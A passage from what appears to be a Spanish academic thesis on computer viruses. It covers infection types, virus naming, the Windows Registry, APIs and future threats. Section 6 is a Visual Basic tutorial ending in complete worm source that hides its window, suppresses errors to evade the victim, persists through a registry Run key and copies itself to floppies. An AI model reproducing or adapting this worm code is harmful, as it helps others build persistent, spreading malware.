disquetes a los que se accedan, ya sea al formatear o al hacer un DIR en el disco, dependiendo de cómo esté programado el virus. El proceso de infección consiste en sustituir el código de arranque original del disco por una versión propia del virus, guardando el original en otra parte del disco; a menudo el virus marca los sectores donde guarda el boot original como en mal estado, protegiéndolos así de posibles accesos, esto suele hacerse por dos motivos: primero, muchos virus no crean una rutina propia de arranque, por lo que una vez residentes en memoria, efectúan una llamada al código de arranque original, para iniciar el sistema y así aparentar que se ha iniciado el sistema como siempre, con normalidad. Segundo, este procedimiento puede ser usado como técnica de ocultamiento. Normalmente un virus completo no cabe en los 512 bytes que ocupa el sector de arranque, por lo que en éste suele copiar una pequeña parte de si mismo, y el resto lo guarda en otros sectores del disco, normalmente los últimos, marcándolos como defectuosos. Sin embargo, puede ocurrir que alguno de los virus no marquen estas zonas, por lo que al llenar el disco estos sectores pueden ser sobrescritos y así dejar de funcionar el virus. La tabla de partición esta situada en el primer sector del disco duro, y contiene una serie de bytes de información de cómo se divide el disco y un pequeño programa de arranque del sistema. Al igual que ocurre con el boot de los disquetes, un virus de partición suplanta el código de arranque original por el suyo propio; así, al arrancar desde disco duro, el virus se instala en memoria para efectuar sus acciones. También en este caso el virus guarda la tabla de partición original en otra parte del disco, aunque algunos la marcan como defectuosa y otros no. Muchos virus guardan la tabla de partición y a ellos mismos en los últimos sectores de disco, y para proteger esta zona, modifican el contenido de la tabla para reducir el tamaño lógico del disco. De esta forma el sistema operativo no tiene acceso a estos datos, puesto que ni siquiera sabe que esta zona existe. Casi todos los virus que afectan la partición también son capaces de hacerlo en el boot de los diskettes y en los archivos ejecutables; un virus que actuara sobre particiones de disco duro tendría un campo de trabajo limitado, por lo que suelen combinar sus habilidades. El tipo de virus que más abunda son los de archivo; en este caso usan como vehículo de expansión los archivos de programa o ejecutables, sobre todo .EXE y .COM, aunque también a veces .OVL, .BIN y .OVR (El Hacker, 2005)20. AL ejecutarse un programa infectado, el virus se instala residente en memoria, y a partir de ahí permanece al acecho; al ejecutar otros programas, comprueba si ya se encuentran infectados. Si no es así, se adhiere al archivo ejecutable, añadiendo

54

su código al principio y al final de éste, y modificando su estructura de forma que al ejecutarse dicho programa primero llama al código del virus devolviendo después el control al programa portador y permitiendo su ejecución normal. El virus al adherirse al archivo hace que este aumente de tamaño al tener que albergar en su interior al virus, siendo esta circunstancia muy útil para su detección. De ahí que la inmensa mayoría de los virus sean programados en lenguaje ensamblador, por ser el que genera el código más compacto, veloz y de menor consumo de memoria; un virus no seria efectivo si fuera fácilmente detectable por su excesiva ocupación en memoria, su lentitud de trabajo o por un aumento exagerado en el tamaño de los archivos infectados. No todos los virus de fichero quedan residentes en memoria, si no que al ejecutarse el portador, éstos infectan a otro archivo, elegido de forma aleatoria un directorio (El Hacker, 2005)20. 5.8 DONDE SE OCULTAN LOS VIRUS Un virus utiliza sus propias medidas de ocultamiento, pudiendo este "ocultarse" en diferentes lugares. Algunos de ellos podrían ser los siguientes: - En memoria principal: en este caso el virus se colocará automáticamente en la memoria principal (memoria RAM) esperando que se ejecute algún programa (fichero con extensión EXE o COM) para infectarlo. Ese tipo de virus, se denomina residente. - Documentos con macros: por regla general, los archivos que no sean programas, no son infectados por ningún tipo de virus. Sin embargo, existen determinados tipos de documentos (ficheros o archivos) con los que el usuario puede trabajar, o que puede crear, que permiten incluir en ellos lo que se denomina macro. Una macro es un conjunto de instrucciones o acciones que otro programa puede llevar a cabo. Pues estas macros pueden formar parte del documento (texto, hoja de cálculo o base de datos) y por tratarse de programas pueden ser infectados por los virus (virus de macro). - Sector de arranque (Boot y Master Boot): el sector de arranque es una sección concreta de un disco (disquete o disco duro) en la que se guarda la información sobre las características de disco y sobre el contenido del mismo. Cuando se habla del sector de arranque de un diskette se utiliza el término BOOT, mientras que si se trata del sector de arranque de un disco duro, se emplea el término Master BOOT (MBR). En ocasiones, esta sección de un disco contiene un programa que permite arrancar el ordenador. Algunos virus (los virus de Boot) se esconden en este lugar infectando ese programa y haciendo, en el arranque del ordenador, que se ejecute el virus (Alerta virus, 2005)3. - Ficheros adjuntos a los mensajes de correo electrónico: cada vez más se utiliza el correo electrónico para el envío de ficheros. Estos ficheros acompañan al mensaje (ficheros adjuntos, anexos o attachments) de texto que se envía,

55

pudiendo estar infectados. Generalmente, cuando se reciben el destinatario no sospecha que el fichero recibido puede contener un virus o que este lo sea, pero al abrir el mensaje y posteriormente abrir el fichero que dentro de él se incluye podría llevarse una sorpresa desagradable. - Páginas Web en Internet: las páginas que se visitan a través de la navegación por Internet, son ficheros que por regla general no deberían estar infectados ya que se trata de documentos de texto (texto, imágenes, sonido). Sin embargo éstas pueden incluir otros elementos denominados Applets de Java o Controles ActiveX. Estos son programas que dotan a la página Web de mayor dinamismo, presentaciones y en definitiva, posibilidades. Por tratarse de programas pueden estar infectados e infectar al usuario que visita la página que los contiene (Alerta virus, 2005)3. 5.9. COMO SABER SI SE TIENE UN VIRUS Muchos virus se anuncian ellos mismos produciendo un sonido o mostrando un mensaje en su pantalla o impresión, pero también es común que un virus no muestre señales de su presencia en absoluto. Los virus se comportan de diferentes formas y no existe un signo indicador absoluto que avise de su presencia. Algunos síntomas al tener un virus puede ser la disminución general del funcionamiento del ordenador, una disminución de la memoria, cambios de archivos, o un disco duro que gira sin razón aparente. Sin embargo, el software legítimo también puede hacer que su ordenador muestre dichas características. Lo mejor es instalar un software anti-virus que pueda escanear y detectar la presencia de la mayoría de los virus (Alerta virus, 2005)4. 5.10. CÓMO SE IMPIDE LA INFECCIÓN DE UN VIRUS La mejor forma para impedir la infección de un virus es la prevención algunos puntos a tener en cuenta son los siguientes: 1. La mejor herramienta para combatir los virus es saber como actúan, infectan y se propagan. 2. Saber el origen de cada programa que se carga en el ordenador y se debe estar seguro de que viene de una fuente de confianza. 3. Hacer siempre una copia de seguridad de los datos en caso de que un virus dañe irreparablemente los archivos (Alerta virus, 2005)4. 4. Tener un disco de arranque con protección de escritura que se haya creado en un ordenador libre de virus en caso de que el ordenador se infecte en el futuro. De esta forma se va ha poder acceder y diagnosticar en el equipo en caso de infección.

56

5. La última línea de defensa es tener software antivirus instalado en el ordenador. Lo ideal es que hubiera dos o más paquetes de software diferentes de antivirus. El software antivirus no es efectivo a no ser que esté actualizado. Los antivirus se fían de la información de sus fabricantes para mantenerlos informados sobre cuales son los últimos virus y como combatirles. Esta información les llega en forma de un archivo de definición. Un antivirus debería estar actualizado a menudo (cada 2 semanas). Esto asegurará que el antivirus está funcionando con lo último cuando chequee y limpie los nuevos virus (Alerta virus, 2005)4.

57

6. CREANDO UN VIRUS 6.1 NOMENCLATURA DE LOS NOMBRES DE VIRUS En los Virus de Macro el primer carácter indica la aplicación, el número que sigue la versión de la aplicación, y acaban con el carácter "M". Primer carácter: "A" - Microsoft Access. "O" - Microsoft Office. "V" - Visio 2000 "X" - Microsoft Excel. Ejemplos: A97M - Virus de macro que funciona en Access 97. AM - Virus de macro que funciona en Access 95 XM - Infecta documentos de Excel 95. V4M - Infecta la versión 4 de Visio. En el caso de Microsoft Excel, también es posible contagiarse con las fórmulas, en este caso en lugar de usar la letra "M" al final se usa la letra "F" de fórmula. Ejemplo: X97F - infectan los ficheros de fórmulas de Excel 97 A parte de lo anterior tenemos los virus escritos en VBS o JavaScript. VBS: Virus de Visual Basic Script, como el ILOVEYOU o el Timofónica. JS: Virus de JavaScript. UNIX: Funcionan en Unix/Linux, están hechos usando lenguaje de shell. Para los virus tradicionales escritos en ensamblador o algún lenguaje compilable, se usa una combinación de tres caracteres que indican en qué plataforma funcionan. W2K: Funciona en Windows 2000. W32: Funciona en plataformas Windows de 32 bits. (Windows 95, 98, ME, NT, 2000, XP). W95, Win95: Funciona en Windows 95 y 98. WNT: Funciona en Windows 32 (Google, 2005)29.

58

Después de los tres primeros caracteres, la barra "/" y un nombre, algunas veces suele ser alguna cadena de texto que se puede encontrar dentro del virus, otras veces el nombre lo ha puesto el propio programador del virus, en algunas ocasiones incluso se usa un número que indica el tamaño en octetos que ocupa el virus. Ejemplo: VBS/Loveletter W32/Petador En algunas ocasiones, un virus puede ser una mutación o variante de otro, por lo que se indica con una letra adiccional separado del nombre con un punto: Ejemplo: VBS/Loveletter.A VBS/Loveletter.B W32/Petador.A W32/Petador.B Los virus más antiguos, de la época del DOS, no usan la nomenclatura de los tres primeros caracteres, como por ejemplo: Flip Barrotes 4096 (Google, 2005)29. 6.2 El REGISTRO DE WINDOWS El Registro de Windows es utilizado en algunos códigos de virus, para que estos puedan ejecutarse al iniciar el sistema operativo, o simplemente para que los antivirus no los puedan detectar ya que al cambiar algún Registro estos programas se camuflan tras la fachada de cualesquier otro proceso de algún aplicativo y así el virus se ejecute sin que estos sean detectados por los programas de seguridad. Pero en realidad que es el Registro de Windows; con las versiones anteriores a Windows 95 (o sea hasta el Windows 3.11) el sistema se valía de los archivos WINDOWS.INI y SYSTEM.INI para enterarse de qué archivos controladores y demás debía cargar para manejar correctamente los dispositivos (como ser placas de sonido, video, scanner, CD ROM, etc...) estos archivos INI eran simples archivos de texto que tenían el siguiente formato (Donatién, 2005)18: [nombre_de_sección] variable_1=valor_1 variable_2=valor_2 ... variable_n=valor_n

59

Por ejemplo, en la sección CD-ROM (si es que existía una) podría haberse leído algo como lo siguiente: Driver=C:\windowssystemcdrom.drv Nombre dispositivo=Sony CDU 99 4/A Cache=512 Con Windows 95 estos archivos fueron reemplazados por el sistema de Registro de 32 bits, que puede incluir datos de varios tipos, no sólo texto, entre estos tipos está el Binario. Por este motivo el registro de Windows que antes era un simple TXT pasó a ser un archivo binario (una base de datos) que sólo puede ser editado con un programa para tal fin. El programa que da Microsoft para hacer esto es el REGEDIT. Ver figura 1. Figura 1. Ventana de Regedit

Este no fue el único cambio que se realizó sobre los archivos de inicio que ahora se llaman Registro, ahora por ejemplo no sólo se pueden crear "subsecciones" llamadas "llaves" o en inglés keys (por ejemplo la subsección que antes era "CDROM") sino que se pueden crear unas dentro de otras como si se trataran de subdirectorios.

60

Con el REGEDIT.EXE se pueden recorrer estas secciones con facilidad y modificar las variables que en ellas se encuentren. Para ejecutar el Regedit se debe entrar en la opción Ejecutar del menú inicio y escribir y Regedit luego aceptar (Donatién, 2005)18. Se debe tener en cuenta que alguna modificación a las opciones que Windows lee al reiniciar puede causar que algún elemento de la computadora no funcione correctamente la próxima vez. El Registro no sólo tiene información del arranque de Windows, sino cualquier dato que las aplicaciones quieran almacenar en él, por eso es muy extenso, y encontrar alguna información requiere de cierta práctica y experiencia (Donatién, 2005)18. 6.3 QUE SON LAS API Las API (“application programming interface” o “interfaz de programación de la aplicación”) de Windows son un conjunto de funciones propias del sistema operativo que se pueden usar en los programas, como por ejemplo, la función “SetWindowPos” que permite mantener una ventana por encima de las demás. Todas estas funciones de Windows están escondidas dentro de unas cuantas DLLs (“Dynamic Link Library” o “Librería de Enlace Dinámico”) agrupadas según la función que realizan: Kernel32.dll – operaciones de archivos y gestión de memoria. Gdi32.dll – operaciones gráficas User32.dll – maneja la parte de la interacción con el usuario. También existen otros DLLs que, aunque menos importantes, también se aplican a los programas: Winmm.dll – se encarga de la parte multimedia Comdlg32.dll – controles comunes para todas las aplicaciones (Ciberteca, 2005)11. 6.3.1 Qué es el API win32. Es un conjunto de funciones, tipos y mensajes predefinidos para poder programar sobre los sistemas operativos de 32 bits de Microsoft. El API Win32, surge para cubrir la necesidad de crear un sistema operativo de 32 bits como es Windows 95, Windows 98, Windows 2000, Windows Xp, etc. Frente al API de 16 bits que existia anteriormente como lo era el Windows 3.1.

61

Un programador que utilice aplicaciones para Windows en este caso que haga uso de este recurso para crear virus, además de conocer el entorno de trabajo de Windows debe conocer también su entorno de programación, al que se le conoce generalmente como interfaz de programación de aplicaciones de Windows (Windows Application Programming Interface, abreviadamente Windows API). La característica primaria de la API de Windows son las funciones y los mensajes internos/externos de Windows (FalKen, 2005)25. Las funciones Windows son el corazón de las aplicaciones Windows. Hay más de 600 funciones de Windows dispuestas para ser llamadas por cualquier lenguaje, como C o Visual Basic. A través de estos mecanismos, se puede realizar gran cantidad de funciones. La utilización de ésta serie de librerías que contienen las funciones de la API pueden solucionar gran cantidad de problemas en la programación, aunque por otro lado no se debe desestimar el gran poder destructivo de las mismas. La depuración de un programa es muy diferente si éste tiene incorporadas llamadas a APIs, ya que el resultado de las mismas en algunos casos puede llegar a ser incomprensible. Cuando se trabaja con éstas funciones siempre es recomendable tener a mano una buena guía o bien tener a mano alguien que sepa, para no encontrarnos con posibles problemas. Las dos principales ventajas que se obtiene con la utilización de APIs es la gran funcionalidad que se le puede dar a una aplicación, y en segundo lugar la gran velocidad de proceso, ya que a menudo es mucho más rápido realizar una función a través de la API adecuada que por medio del lenguaje en si mismo. Los mensajes son utilizados por Windows para permitir que dos o más aplicaciones se comuniquen entre sí y con el propio sistema Windows. Se dice que las aplicaciones Windows son conducidas por mensajes o sucesos. Conocer todas las APIs de Windows es imposible, ya que tiene gran similitud con el hecho de tener que aprenderse el directorio telefónico. Lo que se debe hacer es realizar un razonamiento contrario, al tener una necesidad al programar, y se debe pensar que eso tiene alguna solución con una API. 6.3.2 Que son las librerías Dinámicas (DLLs). Casi todas las APIs de Windows se unen formando librerías de enlace dinámico. Una librería dinámica (Dynamic Link Libraries, abreviadamente DLLs) permite que las aplicaciones Windows compartan código y recursos. Una DLL es actualmente un fichero ejecutable que contiene funciones de Windows que pueden ser utilizadas por todas las aplicaciones. Si bien en DOS se utilizaban librerías de enlace estático, es decir, a la hora de compilar se incluían junto con el código, y de esta manera cuando se ejecutaba la aplicación, todas las librerías se cargaban en memoria esperando a ser invocadas.

62

Sin embargo, cuando se trabaja con DLLs, el enlace con la aplicación es dinámico en tiempo de ejecución. Una DLL no se incluye dentro del código, sino que en el momento en que se realiza la llamada a la función, la DLL se carga en memoria, se utiliza la API, y a continuación se descarga. La gran ventaja que posee este método es que no es necesario tener gran cantidad de código cargado en memoria a la hora de ejecutar la aplicación. Por el contrario, es necesario que cuando se lleve el ejecutable a otra instalación, se tenga que llevar las DLLs necesarias (FalKen, 2005)25. Pero si se tiene que pensar que si se utilizan las DLLS que proporciona Windows, en cualquier máquina con este sistema operativo vamos a encontrar esas mismas DLLs, con lo cual no es necesario que se tenga que cargar con ellas. La utilización de librerías dinámicas tiene ventajas. Una ventaja es que como están separadas del programa se pueden actualizar sin tener que modificar los programas que las utilizan. Otra ventaja es el ahorro de memoria principal y de disco ya que como es Windows quien administra la utilización de las DLLs, no existe duplicidad de código cuando varias aplicaciones las utilizan. Pero también tienen inconvenientes. Uno de ellos es el tiempo que Windows tiene que emplear en leer las funciones que el programa necesita utilizar de una DLL. Otra desventaja es que cada programa ejecutable necesita que estén presentes las DLLs que utiliza. Cuando se utilizan librerías estáticas, las funciones que el programa necesita se incluyen en el mismo, por lo que ni se pierde tiempo en leerlas ni la librería tiene que estar presente. La mayoría de éstas librerías suelen estar localizadas en el directorio SYSTEM de Windows. Dentro de Windows se tiene gran cantidad de DLLs, agrupando las APIs en funciones respecto a un mismo tema. Además en cada nueva versión de Windows, posiblemente salgan más DLLs para utilizar. Para acceder a las funciones de las librerías dinámicas, lo primero que se debe hacer es declararlas (FalKen, 2005)25. 6.4 INICIO Y FINAL DE UN CÓDIGO EN VISUAL BASIC Visual Basic es un entorno de programación de aplicaciones creado por Microsoft, a continuación se proporciona la información necesaria para crear una rutina de un programa residente en Visual Basic 6.0. Al crear un proyecto EXE estándar en Visual, se observa que se crea un panel en donde es posible colocar botones, cuadros de texto, etc., en este caso eso es irrelevante para el programa que se quiere crear. Al hacer doble clic en ese panel llamado FORM, se observa el código interno del panel. Las únicas líneas de código existente son las siguientes.

63

Private Sub Form_Load() End Sub Estas son las etiquetas principales, el inicio y el final del programa, que de aquí en adelante será referenciado como “formulario” (Kuasanagui, 2005)37. Private Sub Form_Load() ----------- es la primera línea de código que se lee del formulario End Sub ----------- es la etiqueta que da fin a la rutina Dentro de estas se coloca el código que queremos que se pretende ejecutar. Se presenta como ejemplo la mundialmente conocida aplicación hola mundo. Private Sub Form_Load() MsgBox “¡Hola Mundo!” End Sub Al ejecutar este código se obtiene la siguiente salida (Figura 2): Figura 2. Salida MsgBox

Después de hacer clic en Aceptar, se abrirá el formulario en blanco en el cual se introdujo el código del saludo. Es necesario ocultar esta ventana para no hacer evidente la ejecución del virus (Figura 3). Figura 3. Form

64

6.5 SUBRUTINAS La subrutinas reducen considerablemente el tamaño del código, lo cual resulta conveniente para la creación de un virus. Agrupan líneas de código que se usan repetidamente en el programa (Kuasanagui, 2005)37. Sub Form_Load() hola_mundo End Sub Sub hola_mundo() MsgBox "¡Hola Mundo!" End Sub 6.6 FileCopy Es el comando que copia archivos en Visual Basic. Esta es la sintaxis para copiar el Worm en cuestión: FileCopy “Archivo origen” , “Archivo destino” Ejemplo: FileCopy “A:\Gusano.EXE” , “C:\GusanoClon.EXE” 6.7 App.EXEName El darle un nombre estático al Word limita considerablemente su radio de acción, debido a que el programa solo se copiara si se encuentra en o si tiene A:\, además si el nombre es modificado no se copiará. Para solucionar este problema se tiene este comando que copia el archivo sin importar el lugar donde esté ubicado, esta es “App.EXEName”, con esta instrucción se obtiene el nombre de la aplicación, esto es útil, ya que así el worm no dependerá de un solo nombre, el comando se encarga de averiguarlo. Si el worm se llama “Gusano” al ejecutar el programa, el valor de App.EXEName será: Gusano, sin embargo, aún es necesario definir la extensión. Ahora uniendo las dos instrucciones, “FileCopy” y “App.EXEName” se obtiene lo siguiente: Sub Form_Load() FileCopy App.EXEName & “.EXE” , “C:\GusanoClon.EXE” End Sub

65

A diferencia de lo hecho con el programa holamundo, en este caso es necesario crear el ejecutable previamente, de lo contrario se generará un mensaje de error. En el menú Archivo se elige Generar Proyecto1.exe, luego se indica la ruta y se nombra el archivo .exe. Desde esta ubicación es posible ejecutarlo. Debe mostrarse en la pantalla entonces un formulario en blanco y en la ubicación indicada en el código el archivo GusanoClon. Si se desea crear una copia del Worm en el directorio en que se ejecuta, en lugar de escribir el nombre de la unidad, se escribe un punto y la diagonal: “.\” Visual Basic entenderá que se pretende copiar en el directorio actual. (Kuasanagui, 2005)37. 6.8 ON ERROR RESUME NEXT En caso de presentarse un error durante la ejecución del virus no es conveniente que el usuario victima vea mensajes en la pantalla, esto le advertiría sobre la ejecución de un programa sospechoso. Por eso es necesario implementar esta instrucción que le indica a VB que en caso de presentarse un error debe simplemente pasar a la siguiente instrucción. 6.9 CREAR ARCHIVOS TXT A veces se deja una firma o un mensaje en un archivo .txt. Para crear archivos, escribir y cerrar en Visual Basic se utilizan los siguientes comandos. “Open”, “For”, “As”, “Output”, “Print” y “Close” Cada vez que se abra o se cree un archivo hay que asignarle un número para que si se realizan varias aperturas y escrituras estas sean fácilmente identificadas por el programa. Open ---------- abre o crea un archivo. Print ---------- escribe dentro del archivo. Close ---------- cierra el archivo. A continuación se presenta la sintaxis: Open Ruta del archivo For Output As #1 Print #1, Texto del archivo Close #1 Esto quiere decir: Abrir o crear el archivo, prepararlo para escritura, y asignarle el numero 1, escribir dentro de 1 un texto y cerrar a 1.

66

De esta manera se pueden dejar firmas en archivos TXT o también crear archivos con cualquier extensión como EXE o MP3, y aunque esos archivos no funcionen, servirán para saturar el disco duro de la victima generando basura (Kuasanagui, 2005)37. Ejemplo: Sub Form_Load() On Error Resume Next Open “C:\ Worm.Win32.TXT” For Output As #1 Print #1, “Este TXT lo genero” Print #1, “el” Print #1, “Worm.Win32.TutorialVB” Close #1 End Sub Esto generara un archivo llamado Worm.Win32.TXT en el directorio raíz de C con el siguiente contenido (Figura 4): Figura 4. Firma del Worm

6.10 MINUTE(NOW) Ahora se explica como hacer una rutina que controle el tiempo de copiado del worm. En Visual Basic existen comandos para obtener las horas, minutos y segundos del sistema, uno de ellos es Minute(Now), que será usado primero. Se evaluará ahora una situación de copiado con IF. Sub Form_Load() On Error Resume Next If Minute(Now) = ".\HijodelGusano.EXE" End Sub

3

Then

FileCopy

App.EXEName

&

".EXE",

Con esto, si se ejecuta el worm y el minuto actual es 5 el Worm procederá a copiarse a la computadora en la ruta indicada.

67

Ahora, esta condición solo seria evaluada una sola vez, pero si se incluye dentro de un ciclo Do el worm estaría residente en la PC, verificando en cada instante si el minuto actual del sistema es 5, copiándose si son las 12:05, las 6:05, etc... Ejemplo: Sub Form_Load() Do If Minute(Now) = 4 Then FileCopy App.EXEName & ".EXE", ".\GusanoClon.EXE" Loop End Sub (Kuasanagui, 2005)37. 6.11 SECOND(NOW) El problema de esto es que como la condición es verificada a cada instante no pararía de leer la unidad de disquetes, haciendo esta conducta muy sospechosa . Por lo tanto se debe agregar otro factor como trigger del copiado, ahora se verificarán el minuto y el segundo actual del sistema. El comando para obtener los segundos del sistema es Second(Now). Sub Form_Load() On Error Resume Next Do If Minute(Now)= 5 And Second(Now) = 5 Then FileCopy App.EXEName & ".EXE", ".\K.EXE" Loop End Sub Este al compilarlo y ejecutarlo hará que se copie al directorio actual cada vez que el minuto y el segundo coincidan con la condición establecida.

68

6.12 OCULTAR EL FORMULARIO DEL PROGRAMA Para ocultar los formularios del programa a la vista del usuario, se debe ir a la ventana propiedades y en la opción “Visible”, se cambia de “True” a “False”. Ver Figura 5 (Kuasanagui, 2005)37. Figura 5. Ventana de propiedades

69

6.13 CÓDIGO EN VB DE UN WORM RESIDENTE Private Sub Form_Load() A = App.EXEName E = ".exe" C = "C:\Gusanoh.exe" On Error Resume Next FileCopy A & E, C Set Gusano = CreateObject("WScript.Shell") Gusano.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ Gusanoh", C Open "C:\Gusanoh.txt" For Output As #1 Print #1, "LINEA DE PRUEBA NUMERO 1" Print #1, "LINEA DE PRUEBA NUMERO 2" Print #1, "LINEA DE PRUEBA NUMERO 3" Print #1, "LINEA DE PRUEBA NUMERO 4" Print #1, "LINEA DE PRUEBA NUMERO 5" Print #1, "LINEA DE PRUEBA NUMERO 6" Close #1 Do M = Minute(Now) S = Second(Now) Y = "A:\Gusanoh.exe" If M = 0 And S = 0 Then FileCopy A & E, Y If M = 5 And S = 0 Then FileCopy A & E, Y If M = 10 And S = 0 Then FileCopy A & E, Y If M = 15 And S = 0 Then FileCopy A & E, Y If M = 20 And S = 0 Then FileCopy A & E, Y If M = 25 And S = 0 Then FileCopy A & E, Y If M = 30 And S = 0 Then FileCopy A & E, Y If M = 35 And S = 0 Then FileCopy A & E, Y If M = 40 And S = 0 Then FileCopy A & E, Y If M = 45 And S = 0 Then FileCopy A & E, Y If M = 50 And S = 0 Then FileCopy A & E, Y If M = 55 And S = 0 Then FileCopy A & E, Y Loop End Sub

70

7. EL FUTURO DE LOS VIRUS En el pasado reciente los virus computacionales emergieron para capturar nuestra atención, respeto y miedo. Y como los virus pasados, las futuras variedades no serán predecibles incluso para las grandes compañías antivirus. Es concebible que los nuevos tipos de virus serán transformados por avances en nuevas tecnologías o quizás su evolución pueda seguir trayectorias similares a las plataformas actuales. Algunas conjeturas que pueden ser una ojeada a las posibles características de los futuros virus: - Explotarán las redes para causar infecciones más rápidamente. - Atacarán sistemas no específicos y sus rutinas destructivas serán iniciadas desde rutas múltiples. - Las fallas de seguridad serán explotadas para tener una mayor cobertura de infección. - Virus multiplataforma emergerán en el futuro. Siempre se debe estar alerta y al tanto de las últimas tecnologías de seguridad. El futuro, como una comunidad digital global, depende en parte de la capacidad de administrar las amenazas de virus cuidadosamente, como también los programas de seguridad diseñados para la protección contra estos. (Soto, 2005)61. Un estudio de Nicholas C. Weaver de la universidad de Berkeley titulado “Warhol worms: The Potential for Very Fast Internet Plagues”, que se encuentra en [www.cs.berkeley.edu/~nwea ver/warhol.html]. Describe de forma hipotética, como podrían ser los gusanos de la siguiente generación, a los que denomina “Warhol” y “Flash”. Virus capaces de infectar todos los ordenadores vulnerables de Internet en menos de 15 minutos. El estudio demuestra que las técnicas que utilizan los gusanos actuales para propagarse son extremadamente ineficientes. En cambio, según este estudio, los “gusanos Warhol” utilizarían técnicas altamente optimizadas para buscar ordenadores vulnerables: “hitlist scanning” (lista de servidores vulnerables elaborada previamente) para la propagación inicial y “permutation scanning” (técnica que intenta encontrar todos los ordenadores vulnerables en el menor tiempo posible) para conseguir propagarse de forma auto-coordinada y completa (Iñaki, 2005)35.

71

El principal problema de este tipo de gusanos es que causarían el daño máximo antes de que fuese posible una respuesta humana. Para cuando los laboratorios de las casas antivirus fuesen capaces de desarrollar, probar y poner a disposición de los usuarios la solución, el virus ya habría terminado su trabajo. Afortunadamente en la actualidad los gusanos todavía no emplean este tipo de técnicas para propagarse, sin embargo en Enero del 2003 el virus SQLSlammer infectó 100.000 ordenadores vulnerables en menos de media hora, y la mayor parte de ellos en los 15 primeros minutos. El SQLSlammer no es propiamente un gusano de tipo Warhol, pues no utiliza las técnicas descritas en el estudio, pero aún así, consiguió demostrar que es posible crear un virus que se propague a todos los ordenadores vulnerables en un tiempo tan corto que no es viable la respuesta humana. Se puede concluir que el futuro de la seguridad informática necesita un nuevo enfoque. Las amenazas son cada vez mayores y más rápidas, obligando a que las empresas de antivirus redoblen esfuerzos y reaccionen cada vez más rápidamente para evitar las epidemias. Las actuales soluciones de seguridad son extremadamente eficientes combatiendo amenazas conocidas, pero la exigencia es cada vez mayor y el hecho de que las actuales soluciones de seguridad sean inherentemente reactivas, supone una pérdida de tiempo que ahora puede ser vital. Es importante que estos sean proactivos y se adelanten al problema. La proactividad en la seguridad informática se debe basar en combatir las nuevas amenazas que acechan a los sistemas sin necesidad de conocer previamente cuáles son. Los comportamientos de los códigos maliciosos deben poder preverse, pero para ello no es suficiente la tecnología actual, es necesario analizar directamente el protocolo TCP/IP, descubrir intentos de desbordamientos de buffer, inyecciones de código, cubrir nuevos vectores de propagación, etc... Dentro de las tecnologías proactivas, destacan las de análisis de comportamiento, que en pruebas reales han demostrado ser muy efectivas contra virus y otras amenazas desconocidas. Gracias a estas tecnologías los usuarios, podrán contar en breve con soluciones que no exijan una reacción, sino que se adelantarán a la amenaza de malware que intenta llevar a cabo acciones maliciosas. También dentro de poco podrían aparecer nuevos escenarios de infecciones víricas; La convergencia de tecnologías que se está produciendo hoy en día conseguirá que dentro de poco no se pueda distinguir dónde termina un ordenador y dónde comienza un teléfono, o si la propagación de un virus se produce a través de una red inalámbrica o mediante conexiones directas entre dos sistemas (Iñaki, 2005)35.

72

El futuro exacto de lo que serán los virus es difícil de predecir, pero definitivamente van a resultar mucho más dañinos y difíciles de combatir. Las nuevas tecnologías y los defectos de software continúan haciendo la propagación de los virus más y más fácil, y las técnicas antivirus tienen que evolucionar para poder mantener el mismo paso. Fred Cohen, el experto en seguridad que acuñase el término de “virus de computadora” en 1983, dice que la naturaleza de los virus va a continuar evolucionando. “Es poco probable que alguien vaya a crear un virus que pueda diseminarse a todos los sistemas de computadoras en el mundo y destruir todo”, dice. “Pero otros virus más avanzados serán capaces de dirigirse con más precisión a su objetivo y tener mucha mayor longevidad.”. Cohen describe el virus del futuro como aquel que, una vez introducido en el sistema, podría engendrar subvariantes de sí mismo, que a su vez, volverían a engendrar sus propias variantes, cada una de las cuales afectaría la computadora en diferentes formas. La detección y eliminación de todos los retoños de un virus como éste, podría llegar a resultar una tarea sumamente compleja. Ya se han presentado tipos de virus avanzados que en su forma de actuar se asemejan a los que se proliferarán en el futuro. Esta nueva variedad de la que los recientes Bubbleboy y Kak son ejemplos vienen incorporados en el texto de un correo electrónico y se activan sin necesidad de que el usuario tenga que abrir un anexo. Como una combinación de virus y gusano, contiene un código HTML que explota una vulnerabilidad que tienen los programas Outlook e Internet Explorer 5x. Una vez que se abre el mensaje de correo electrónico, el código incorporado copia el virus dentro del sistema, y en el caso particular del Kak, dentro de la carpeta donde inicia el Windows. La próxima vez que arranque el Windows, el virus liberará su carga. Algunas vulnerabilidades recientemente descubiertas en Outlook y Outlook Express permitirían incluso a algunos virus avanzar un paso más allá, infectando el equipo aun antes de que el usuario lea el mensaje electrónico que le ha sido enviado. En la actualidad, no existe ningún virus de este tipo, pero un tipo de virus como éste podría dispararse en el mismo instante en que la persona abra su correo. Para este hueco de seguridad se puede descargar el parche para subsanar esta deficiencia de Outlook en www.pcworld.com/downloads; pero más vulnerabilidades de esta índole se pueden seguir presentando. El futuro de los virus no reside en destruir datos, sino en capturarlos. El señor Srivats Sampath, presidente y CEO de McAfee.com advierte: “Se verá un número creciente de sitios maliciosos en la Web que tratarán de robar la información al usuario mientras este se encuentre navegando en ella”. Algunos investigadores de la propia McAfee afirman que ya han recibido numerosos informes de sitios que auto descargan caballos de Troya capaces de enviar información hacia la fuente que los originó, es decir, el propio autor.

73

Hasta ahora, las compañías dedicadas a la preservación de la seguridad y privacidad en el mundo de la computación y la Web, no tienen solución aún para este tipo de amenaza. Cierto software de protección anunciara cuando un sitio está tratando de descargar algo hacia la PC del usuario, pero la mayoría de los cortafuegos aun no son capaces informar cuando un sitio está extrayendo información del equipo. Sin embargo la última versión del cortafuego y servicio de privacidad personal de McAfee.com informa a los usuarios que están explorando la Web cuando un sitio determinado está tratando de leer archivos o tomar información (Miastkowski, 2005)41. La novena edición (2004) del CSI/FBI Computer Crime and Security Survey, indica como los ataques por virus y la negación de servicio, sobrepasaron las pérdidas registradas por el robo de información; sólo los ataques por virus alcanzaron unos $ 55 millones anuales según reportaron las 491 empresas encuestadas (Figura 6). Estas cifras revelan que hoy en día existe una mayor preocupación por detener las consecuencias de estos programas que fueron creados inicialmente sin una intención perniciosa, y que hoy en día representan un “dolor de cabeza” para los responsables de mantener la operatividad y la seguridad de la información. Figura 6. Pérdidas reportadas por incidentes de seguridad

Fuente: CSI/FBI 2004 Computer Crime and Security Survey (Espiñeira, 2005)23.

74

